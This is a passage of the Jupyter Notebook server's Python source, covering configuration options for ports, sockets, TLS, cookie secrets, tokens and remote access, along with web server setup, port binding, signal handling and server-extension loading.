port = Integer(port_default_value, config=True,
help=_("The port the notebook server will listen on (env: JUPYTER_PORT).")
)
@default('port')
def port_default(self):
return int(os.getenv(self.port_env, self.port_default_value))
port_retries_env = 'JUPYTER_PORT_RETRIES'
port_retries_default_value = 50
port_retries = Integer(port_retries_default_value, config=True,
help=_("The number of additional ports to try if the specified port is not "
"available (env: JUPYTER_PORT_RETRIES).")
)
@default('port_retries')
def port_retries_default(self):
return int(os.getenv(self.port_retries_env, self.port_retries_default_value))
sock = Unicode(u'', config=True,
help=_("The UNIX socket the notebook server will listen on.")
)
sock_mode = Unicode('0600', config=True,
help=_("The permissions mode for UNIX socket creation (default: 0600).")
)
@validate('sock_mode')
def _validate_sock_mode(self, proposal):
value = proposal['value']
try:
converted_value = int(value.encode(), 8)
assert all((
# Ensure the mode is at least user readable/writable.
bool(converted_value & stat.S_IRUSR),
bool(converted_value & stat.S_IWUSR),
# And isn't out of bounds.
converted_value <= 2 ** 12
))
except ValueError as e:
raise TraitError(
'invalid --sock-mode value: %s, please specify as e.g. "0600"' % value
) from e
except AssertionError as e:
raise TraitError(
'invalid --sock-mode value: %s, must have u+rw (0600) at a minimum' % value
) from e
return value
certfile = Unicode(u'', config=True,
help=_("""The full path to an SSL/TLS certificate file.""")
)
keyfile = Unicode(u'', config=True,
help=_("""The full path to a private key file for usage with SSL/TLS.""")
)
client_ca = Unicode(u'', config=True,
help=_("""The full path to a certificate authority certificate for SSL/TLS client authentication.""")
)
cookie_secret_file = Unicode(config=True,
help=_("""The file where the cookie secret is stored.""")
)
@default('cookie_secret_file')
def _default_cookie_secret_file(self):
return os.path.join(self.runtime_dir, 'notebook_cookie_secret')
cookie_secret = Bytes(b'', config=True,
help="""The random bytes used to secure cookies.
By default this is a new random number every time you start the Notebook.
Set it to a value in a config file to enable logins to persist across server sessions.
Note: Cookie secrets should be kept private, do not share config files with
cookie_secret stored in plaintext (you can read the value from a file).
"""
)
@default('cookie_secret')
def _default_cookie_secret(self):
if os.path.exists(self.cookie_secret_file):
with io.open(self.cookie_secret_file, 'rb') as f:
key = f.read()
else:
key = encodebytes(os.urandom(32))
self._write_cookie_secret_file(key)
h = hmac.new(key, digestmod=hashlib.sha256)
h.update(self.password.encode())
return h.digest()
def _write_cookie_secret_file(self, secret):
"""write my secret to my secret_file"""
self.log.info(_("Writing notebook server cookie secret to %s"), self.cookie_secret_file)
try:
with io.open(self.cookie_secret_file, 'wb') as f:
f.write(secret)
except OSError as e:
self.log.error(_("Failed to write cookie secret to %s: %s"),
self.cookie_secret_file, e)
try:
os.chmod(self.cookie_secret_file, 0o600)
except OSError:
self.log.warning(
_("Could not set permissions on %s"),
self.cookie_secret_file
)
token = Unicode('<generated>',
help=_("""Token used for authenticating first-time connections to the server.
The token can be read from the file referenced by JUPYTER_TOKEN_FILE or set directly
with the JUPYTER_TOKEN environment variable.
When no password is enabled,
the default is to generate a new, random token.
Setting to an empty string disables authentication altogether, which is NOT RECOMMENDED.
""")
).tag(config=True)
_token_generated = True
@default('token')
def _token_default(self):
if os.getenv('JUPYTER_TOKEN'):
self._token_generated = False
return os.getenv('JUPYTER_TOKEN')
if os.getenv('JUPYTER_TOKEN_FILE'):
self._token_generated = False
with io.open(os.getenv('JUPYTER_TOKEN_FILE'), "r") as token_file:
return token_file.read()
if self.password:
# no token if password is enabled
self._token_generated = False
return u''
else:
self._token_generated = True
return binascii.hexlify(os.urandom(24)).decode('ascii')
max_body_size = Integer(512 * 1024 * 1024, config=True,
help="""
Sets the maximum allowed size of the client request body, specified in
the Content-Length request header field. If the size in a request
exceeds the configured value, a malformed HTTP message is returned to
the client.
Note: max_body_size is applied even in streaming mode.
"""
)
max_buffer_size = Integer(512 * 1024 * 1024, config=True,
help="""
Gets or sets the maximum amount of memory, in bytes, that is allocated
for use by the buffer manager.
"""
)
min_open_files_limit = Integer(config=True,
help="""
Gets or sets a lower bound on the open file handles process resource
limit. This may need to be increased if you run into an
OSError: [Errno 24] Too many open files.
This is not applicable when running on Windows.
""")
@default('min_open_files_limit')
def _default_min_open_files_limit(self):
if resource is None:
# Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)
return None
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
DEFAULT_SOFT = 4096
if hard >= DEFAULT_SOFT:
return DEFAULT_SOFT
self.log.debug("Default value for min_open_files_limit is ignored (hard=%r, soft=%r)", hard, soft)
return soft
@observe('token')
def _token_changed(self, change):
self._token_generated = False
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from notebook.auth import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
password_required = Bool(False, config=True,
help="""Forces users to use a password for the Notebook server.
This is useful in a multi user environment, for instance when
everybody in the LAN can access each other's machine through ssh.
In such a case, serving the notebook server on localhost is not secure
since any user can connect to the notebook server via ssh.
"""
)
allow_password_change = Bool(True, config=True,
help="""Allow password to be changed at login for the notebook server.
While logging in with a token, the notebook server UI will give the opportunity to
the user to enter a new password at the same time that will replace
the token login mechanism.
This can be set to false to prevent changing password from the UI/API.
"""
)
disable_check_xsrf = Bool(False, config=True,
help="""Disable cross-site-request-forgery protection
Jupyter notebook 4.3.1 introduces protection from cross-site request forgeries,
requiring API requests to either:
- originate from pages served by this server (validated with XSRF cookie and token), or
- authenticate with a token
Some anonymous compute resources still desire the ability to run code,
completely without authentication.
These services can disable all authentication and security checks,
with the full knowledge of what that implies.
"""
)
allow_remote_access = Bool(config=True,
help="""Allow requests where the Host header doesn't point to a local server
By default, requests get a 403 forbidden response if the 'Host' header
shows that the browser thinks it's on a non-local domain.
Setting this option to True disables this check.
This protects against 'DNS rebinding' attacks, where a remote web server
serves you a page and then changes its DNS to send later requests to a
local IP, bypassing same-origin checks.
Local IP addresses (such as 127.0.0.1 and ::1) are allowed as local,
along with hostnames configured in local_hostnames.
""")
@default('allow_remote_access')
def _default_allow_remote(self):
"""Disallow remote access if we're listening only on loopback addresses"""
# if blank, self.ip was configured to "*" meaning bind to all interfaces,
# see _valdate_ip
if self.ip == "":
return True
try:
addr = ipaddress.ip_address(self.ip)
except ValueError:
# Address is a hostname
for info in socket.getaddrinfo(self.ip, self.port, 0, socket.SOCK_STREAM):
addr = info[4][0]
if not py3compat.PY3:
addr = addr.decode('ascii')
try:
parsed = ipaddress.ip_address(addr.split('%')[0])
except ValueError:
self.log.warning("Unrecognised IP address: %r", addr)
continue
# Macs map localhost to 'fe80::1%lo0', a link local address
# scoped to the loopback interface. For now, we'll assume that
# any scoped link-local address is effectively local.
if not (parsed.is_loopback
or (('%' in addr) and parsed.is_link_local)):
return True
return False
else:
return not addr.is_loopback
local_hostnames = List(Unicode(), ['localhost'], config=True,
help="""Hostnames to allow as local when allow_remote_access is False.
Local IP addresses (such as 127.0.0.1 and ::1) are automatically accepted
as local as well.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
webapp_settings = Dict(config=True,
help=_("DEPRECATED, use tornado_settings")
)
@observe('webapp_settings')
def _update_webapp_settings(self, change):
self.log.warning(_("\n webapp_settings is deprecated, use tornado_settings.\n"))
self.tornado_settings = change['new']
tornado_settings = Dict(config=True,
help=_("Supply overrides for the tornado.web.Application that the "
"Jupyter notebook uses."))
websocket_compression_options = Any(None, config=True,
help=_("""
Set the tornado compression options for websocket connections.
This value will be returned from :meth:`WebSocketHandler.get_compression_options`.
None (default) will disable compression.
A dict (even an empty one) will enable compression.
See the tornado docs for WebSocketHandler.get_compression_options for details.
""")
)
terminado_settings = Dict(config=True,
help=_('Supply overrides for terminado. Currently only supports "shell_command". '
'On Unix, if "shell_command" is not provided, a non-login shell is launched '
"by default when the notebook server is connected to a terminal, a login "
"shell otherwise."))
cookie_options = Dict(config=True,
help=_("Extra keyword arguments to pass to `set_secure_cookie`."
" See tornado's set_secure_cookie docs for details.")
)
get_secure_cookie_kwargs = Dict(config=True,
help=_("Extra keyword arguments to pass to `get_secure_cookie`."
" See tornado's get_secure_cookie docs for details.")
)
ssl_options = Dict(config=True,
help=_("""Supply SSL options for the tornado HTTPServer.
See the tornado docs for details."""))
jinja_environment_options = Dict(config=True,
help=_("Supply extra arguments that will be passed to Jinja environment."))
jinja_template_vars = Dict(
config=True,
help=_("Extra variables to supply to jinja templates when rendering."),
)
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library Jupyter uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
@observe('enable_mathjax')
def _update_enable_mathjax(self, change):
"""set mathjax url to empty if mathjax is disabled"""
if not change['new']:
self.mathjax_url = u''
base_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
@validate('base_url')
def _update_base_url(self, proposal):
value = proposal['value']
if not value.startswith('/'):
value = '/' + value
if not value.endswith('/'):
value = value + '/'
return value
base_project_url = Unicode('/', config=True, help=_("""DEPRECATED use base_url"""))
@observe('base_project_url')
def _update_base_project_url(self, change):
self.log.warning(_("base_project_url is deprecated, use base_url"))
self.base_url = change['new']
extra_static_paths = List(Unicode(), config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
static_custom_path = List(Unicode(),
help=_("""Path to search for custom.js, css""")
)
@default('static_custom_path')
def _default_static_custom_path(self):
return [
os.path.join(d, 'custom') for d in (
self.config_dir,
DEFAULT_STATIC_FILES_PATH)
]
extra_template_paths = List(Unicode(), config=True,
help=_("""Extra paths to search for serving jinja templates.
Can be used to override templates from notebook.templates.""")
)
@property
def template_file_path(self):
"""return extra paths + the default locations"""
return self.extra_template_paths + DEFAULT_TEMPLATE_PATH_LIST
extra_nbextensions_path = List(Unicode(), config=True,
help=_("""extra paths to look for Javascript notebook extensions""")
)
extra_services = List(Unicode(), config=True,
help=_("""handlers that should be loaded at higher priority than the default services""")
)
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = self.extra_nbextensions_path + jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
websocket_url = Unicode("", config=True,
help="""The base URL for websockets,
if it differs from the HTTP server (hint: it almost certainly doesn't).
Should be in the form of an HTTP origin: ws[s]://hostname[:port]
"""
)
mathjax_url = Unicode("", config=True,
help="""A custom url for MathJax.js.
Should be in the form of a case-sensitive url to MathJax,
for example: /static/components/MathJax/MathJax.js
"""
)
@default('mathjax_url')
def _default_mathjax_url(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.tornado_settings.get("static_url_prefix", "static")
return url_path_join(static_url_prefix, 'components', 'MathJax', 'MathJax.js')
@observe('mathjax_url')
def _update_mathjax_url(self, change):
new = change['new']
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info(_("Using MathJax: %s"), new)
mathjax_config = Unicode("TeX-AMS-MML_HTMLorMML-full,Safe", config=True,
help=_("""The MathJax.js configuration file that is to be used.""")
)
@observe('mathjax_config')
def _update_mathjax_config(self, change):
self.log.info(_("Using MathJax configuration file: %s"), change['new'])
quit_button = Bool(True, config=True,
help="""If True, display a button in the dashboard to quit
(shutdown the notebook server)."""
)
# We relax this trait to handle Contents Managers using jupyter_server
# as the core backend.
contents_manager_class = TypeFromClasses(
default_value=LargeFileManager,
klasses=[
ContentsManager,
# To make custom ContentsManagers both forward+backward
# compatible, we'll relax the strictness of this trait
# and allow jupyter_server contents managers to pass
# through. If jupyter_server is not installed, this class
# will be ignored.
'jupyter_server.contents.services.managers.ContentsManager'
],
config=True,
help=_('The notebook manager class to use.')
)
# Throws a deprecation warning to jupyter_server based contents managers.
@observe('contents_manager_class')
def _observe_contents_manager_class(self, change):
new = change['new']
# If 'new' is a class, get a string representing the import
# module path.
if inspect.isclass(new):
new = new.__module__
if new.startswith('jupyter_server'):
self.log.warning(
"The specified 'contents_manager_class' class inherits a manager from the "
"'jupyter_server' package. These (future-looking) managers are not "
"guaranteed to work with the 'notebook' package. For longer term support "
"consider switching to NBClassic—a notebook frontend that leverages "
"Jupyter Server as its server backend."
)
kernel_manager_class = Type(
default_value=MappingKernelManager,
klass=MappingKernelManager,
config=True,
help=_('The kernel manager class to use.')
)
session_manager_class = Type(
default_value=SessionManager,
config=True,
help=_('The session manager class to use.')
)
config_manager_class = Type(
default_value=ConfigManager,
config = True,
help=_('The config manager class to use')
)
kernel_spec_manager = Instance(KernelSpecManager, allow_none=True)
kernel_spec_manager_class = Type(
default_value=KernelSpecManager,
config=True,
help="""
The kernel spec manager class to use. Should be a subclass
of `jupyter_client.kernelspec.KernelSpecManager`.
The Api of KernelSpecManager is provisional and might change
without warning between this version of Jupyter and the next stable one.
"""
)
login_handler_class = Type(
default_value=LoginHandler,
klass=web.RequestHandler,
config=True,
help=_('The login handler class to use.'),
)
logout_handler_class = Type(
default_value=LogoutHandler,
klass=web.RequestHandler,
config=True,
help=_('The logout handler class to use.'),
)
trust_xheaders = Bool(False, config=True,
help=(_("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers "
"sent by the upstream reverse proxy. Necessary if the proxy handles SSL"))
)
info_file = Unicode()
@default('info_file')
def _default_info_file(self):
info_file = "nbserver-%s.json" % os.getpid()
return os.path.join(self.runtime_dir, info_file)
browser_open_file = Unicode()
@default('browser_open_file')
def _default_browser_open_file(self):
basename = "nbserver-%s-open.html" % os.getpid()
return os.path.join(self.runtime_dir, basename)
pylab = Unicode('disabled', config=True,
help=_("""
DISABLED: use %pylab or %matplotlib in the notebook to enable matplotlib.
""")
)
@observe('pylab')
def _update_pylab(self, change):
"""when --pylab is specified, display a warning and exit"""
if change['new'] != 'warn':
backend = ' %s' % change['new']
else:
backend = ''
self.log.error(_("Support for specifying --pylab on the command line has been removed."))
self.log.error(
_("Please use `%pylab{0}` or `%matplotlib{0}` in the notebook itself.").format(backend)
)
self.exit(1)
notebook_dir = Unicode(config=True,
help=_("The directory to use for notebooks and kernels.")
)
@default('notebook_dir')
def _default_notebook_dir(self):
if self.file_to_run:
return os.path.dirname(os.path.abspath(self.file_to_run))
else:
return py3compat.getcwd()
@validate('notebook_dir')
def _notebook_dir_validate(self, proposal):
value = proposal['value']
# Strip any trailing slashes
# *except* if it's root
_, path = os.path.splitdrive(value)
if path == os.sep:
return value
value = value.rstrip(os.sep)
if not os.path.isabs(value):
# If we receive a non-absolute path, make it absolute.
value = os.path.abspath(value)
if not os.path.isdir(value):
raise TraitError(trans.gettext("No such notebook dir: '%r'") % value)
return value
# TODO: Remove me in notebook 5.0
server_extensions = List(Unicode(), config=True,
help=(_("DEPRECATED use the nbserver_extensions dict instead"))
)
@observe('server_extensions')
def _update_server_extensions(self, change):
self.log.warning(_("server_extensions is deprecated, use nbserver_extensions"))
self.server_extensions = change['new']
nbserver_extensions = Dict({}, config=True,
help=(_("Dict of Python modules to load as notebook server extensions. "
"Entry values can be used to enable and disable the loading of "
"the extensions. The extensions will be loaded in alphabetical "
"order."))
)
reraise_server_extension_failures = Bool(
False,
config=True,
help=_("Reraise exceptions encountered loading server extensions?"),
)
iopub_msg_rate_limit = Float(1000, config=True, help=_("""(msgs/sec)
Maximum rate at which messages can be sent on iopub before they are
limited."""))
iopub_data_rate_limit = Float(1000000, config=True, help=_("""(bytes/sec)
Maximum rate at which stream output can be sent on iopub before they are
limited."""))
rate_limit_window = Float(3, config=True, help=_("""(sec) Time window used to
check the message and data rate limits."""))
shutdown_no_activity_timeout = Integer(0, config=True,
help=("Shut down the server after N seconds with no kernels or "
"terminals running and no activity. "
"This can be used together with culling idle kernels "
"(MappingKernelManager.cull_idle_timeout) to "
"shutdown the notebook server when it's not in use. This is not "
"precisely timed: it may shut down up to a minute later. "
"0 (the default) disables this automatic shutdown.")
)
terminals_enabled = Bool(True, config=True,
help=_("""Set to False to disable terminals.
This does *not* make the notebook server more secure by itself.
Anything the user can in a terminal, they can also do in a notebook.
Terminals may also be automatically disabled if the terminado package
is not available.
"""))
authenticate_prometheus = Bool(
True,
help=""""
Require authentication to access prometheus metrics.
"""
).tag(config=True)
@default('authenticate_prometheus')
def _default_authenticate_prometheus(self):
""" Authenticate Prometheus by default, unless auth is disabled. """
auth = bool(self.password) or bool(self.token)
if auth is False:
self.log.info(_("Authentication of /metrics is OFF, since other authentication is disabled."))
return auth
@observe('authenticate_prometheus')
def _update_authenticate_prometheus(self, change):
newauth = change['new']
if self.authenticate_prometheus is True and newauth is False:
self.log.info(_("Authentication of /metrics is being turned OFF."))
self.authenticate_prometheus = newauth
# Since use of terminals is also a function of whether the terminado package is
# available, this variable holds the "final indication" of whether terminal functionality
# should be considered (particularly during shutdown/cleanup). It is enabled only
# once both the terminals "service" can be initialized and terminals_enabled is True.
# Note: this variable is slightly different from 'terminals_available' in the web settings
# in that this variable *could* remain false if terminado is available, yet the terminal
# service's initialization still fails. As a result, this variable holds the truth.
terminals_available = False
def parse_command_line(self, argv=None):
super().parse_command_line(argv)
if self.extra_args:
arg0 = self.extra_args[0]
f = os.path.abspath(arg0)
self.argv.remove(arg0)
if not os.path.exists(f):
self.log.critical(_("No such file or directory: %s"), f)
self.exit(1)
# Use config here, to ensure that it takes higher priority than
# anything that comes from the config dirs.
c = Config()
if os.path.isdir(f):
c.NotebookApp.notebook_dir = f
elif os.path.isfile(f):
c.NotebookApp.file_to_run = f
self.update_config(c)
def init_configurables(self):
# If gateway server is configured, replace appropriate managers to perform redirection. To make
# this determination, instantiate the GatewayClient config singleton.
self.gateway_config = GatewayClient.instance(parent=self)
if self.gateway_config.gateway_enabled:
self.kernel_manager_class = 'notebook.gateway.managers.GatewayKernelManager'
self.session_manager_class = 'notebook.gateway.managers.GatewaySessionManager'
self.kernel_spec_manager_class = 'notebook.gateway.managers.GatewayKernelSpecManager'
self.kernel_spec_manager = self.kernel_spec_manager_class(
parent=self,
)
self.kernel_manager = self.kernel_manager_class(
parent=self,
log=self.log,
connection_dir=self.runtime_dir,
kernel_spec_manager=self.kernel_spec_manager,
)
# Ensure the appropriate version of Python and jupyter_client is available.
if isinstance(self.kernel_manager, AsyncMappingKernelManager):
if not async_kernel_mgmt_available: # Can be removed once jupyter_client >= 6.1 is required.
raise ValueError("You are using `AsyncMappingKernelManager` without an appropriate "
"jupyter_client installed! Please upgrade jupyter_client or change kernel managers.")
self.log.info("Asynchronous kernel management has been configured to use '{}'.".
format(self.kernel_manager.__class__.__name__))
self.contents_manager = self.contents_manager_class(
parent=self,
log=self.log,
)
self.session_manager = self.session_manager_class(
parent=self,
log=self.log,
kernel_manager=self.kernel_manager,
contents_manager=self.contents_manager,
)
self.config_manager = self.config_manager_class(
parent=self,
log=self.log,
)
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dispatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
for log in app_log, access_log, gen_log:
# consistent log output name (NotebookApp instead of tornado.access, etc.)
log.name = self.log.name
# hook up tornado 3's loggers to our app handlers
logger = logging.getLogger('tornado')
logger.propagate = True
logger.parent = self.log
logger.setLevel(self.log.level)
def init_resources(self):
"""initialize system resources"""
if resource is None:
self.log.debug('Ignoring min_open_files_limit because the limit cannot be adjusted (for example, on Windows)')
return
old_soft, old_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
soft = self.min_open_files_limit
hard = old_hard
if old_soft < soft:
if hard < soft:
hard = soft
self.log.debug(
'Raising open file limit: soft {}->{}; hard {}->{}'.format(old_soft, soft, old_hard, hard)
)
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.tornado_settings['allow_origin'] = self.allow_origin
self.tornado_settings['websocket_compression_options'] = self.websocket_compression_options
if self.allow_origin_pat:
self.tornado_settings['allow_origin_pat'] = re.compile(self.allow_origin_pat)
self.tornado_settings['allow_credentials'] = self.allow_credentials
self.tornado_settings['autoreload'] = self.autoreload
self.tornado_settings['cookie_options'] = self.cookie_options
self.tornado_settings['get_secure_cookie_kwargs'] = self.get_secure_cookie_kwargs
self.tornado_settings['token'] = self.token
# ensure default_url starts with base_url
if not self.default_url.startswith(self.base_url):
self.default_url = url_path_join(self.base_url, self.default_url)
if self.password_required and (not self.password):
self.log.critical(_("Notebook servers are configured to only be run with a password."))
self.log.critical(_("Hint: run the following command to set a password"))
self.log.critical(_("\t$ python -m notebook.auth password"))
sys.exit(1)
# Socket options validation.
if self.sock:
if self.port != DEFAULT_NOTEBOOK_PORT:
self.log.critical(
_('Options --port and --sock are mutually exclusive. Aborting.'),
)
sys.exit(1)
else:
# Reset the default port if we're using a UNIX socket.
self.port = 0
if self.open_browser:
# If we're bound to a UNIX socket, we can't reliably connect from a browser.
self.log.info(
_('Ignoring --NotebookApp.open_browser due to --sock being used.'),
)
if self.file_to_run:
self.log.critical(
_('Options --NotebookApp.file_to_run and --sock are mutually exclusive.'),
)
sys.exit(1)
if sys.platform.startswith('win'):
self.log.critical(
_('Option --sock is not supported on Windows, but got value of %s. Aborting.' % self.sock),
)
sys.exit(1)
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.contents_manager,
self.session_manager, self.kernel_spec_manager,
self.config_manager, self.extra_services,
self.log, self.base_url, self.default_url, self.tornado_settings,
self.jinja_environment_options,
)
ssl_options = self.ssl_options
if self.certfile:
ssl_options['certfile'] = self.certfile
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
if self.client_ca:
ssl_options['ca_certs'] = self.client_ca
if not ssl_options:
# None indicates no SSL config
ssl_options = None
else:
# SSL may be missing, so only import it if it's to be used
import ssl
# PROTOCOL_TLS selects the highest ssl/tls protocol version that both the client and
# server support. When PROTOCOL_TLS is not available use PROTOCOL_SSLv23.
# PROTOCOL_TLS is new in version 2.7.13, 3.5.3 and 3.6
ssl_options.setdefault(
'ssl_version',
getattr(ssl, 'PROTOCOL_TLS', ssl.PROTOCOL_SSLv23)
)
if ssl_options.get('ca_certs', False):
ssl_options.setdefault('cert_reqs', ssl.CERT_REQUIRED)
self.login_handler_class.validate_security(self, ssl_options=ssl_options)
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders,
max_body_size=self.max_body_size,
max_buffer_size=self.max_buffer_size)
def _bind_http_server(self):
return self._bind_http_server_unix() if self.sock else self._bind_http_server_tcp()
def _bind_http_server_unix(self):
if unix_socket_in_use(self.sock):
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
try:
sock = bind_unix_socket(self.sock, mode=int(self.sock_mode.encode(), 8))
self.http_server.add_socket(sock)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.warning(_('The socket %s is already in use.') % self.sock)
return False
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on sock %s denied") % self.sock)
return False
else:
raise
else:
return True
def _bind_http_server_tcp(self):
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
eacces = (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES))
if sys.platform == 'cygwin':
# Cygwin has a bug that causes EPERM to be returned in this
# case instead of EACCES:
# https://cygwin.com/ml/cygwin/2019-04/msg00160.html
eacces += (errno.EPERM,)
if e.errno == errno.EADDRINUSE:
if self.port_retries:
self.log.info(_('The port %i is already in use, trying another port.') % port)
else:
self.log.info(_('The port %i is already in use.') % port)
continue
elif e.errno in eacces:
self.log.warning(_("Permission to listen on port %i denied.") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
if self.port_retries:
self.log.critical(_('ERROR: the notebook server could not be started because '
'no available port could be found.'))
else:
self.log.critical(_('ERROR: the notebook server could not be started because '
'port %i is not available.') % port)
self.exit(1)
return success
def _concat_token(self, url):
token = self.token if self._token_generated else '...'
return url_concat(url, {'token': token})
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
elif self.sock:
url = self._unix_sock_url()
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._tcp_url(ip)
if self.token and not self.sock:
url = self._concat_token(url)
if not self.custom_display_url:
url += '\n or %s' % self._concat_token(self._tcp_url('127.0.0.1'))
return url
@property
def connection_url(self):
if self.sock:
return self._unix_sock_url()
else:
ip = self.ip if self.ip else 'localhost'
return self._tcp_url(ip)
def _unix_sock_url(self, token=None):
return '%s%s' % (urlencode_unix_socket(self.sock), self.base_url)
def _tcp_url(self, ip, port=None):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, port or self.port, self.base_url)
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from .terminal import initialize
initialize(nb_app=self)
self.terminals_available = True
except ImportError as e:
self.log.warning(_("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_('interrupted'))
# Check if answer_yes is set
if self.answer_yes:
self.log.critical(_("Shutting down..."))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
print(self.notebook_info())
yes = _('y')
no = _('n')
sys.stdout.write(_("Shutdown this notebook server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
else:
print(_("No answer for 5s:"), end=' ')
print(_("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_("received signal %s, stopping"), sig)
self.io_loop.add_callback_from_signal(self.io_loop.stop)
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extension_config(self):
"""Consolidate server extensions specified by all configs.
The resulting list is stored on self.nbserver_extensions and updates config object.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.nbserver_extensions:
self.config.NotebookApp.nbserver_extensions.update({modulename: enabled})
self.nbserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
for modulename, enabled in sorted(self.nbserver_extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning(_("Error loading server extension %s"), modulename,
exc_info=True)
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
# and explicitly tell the mimetypes to not trust the Windows registry
if os.name == 'nt':
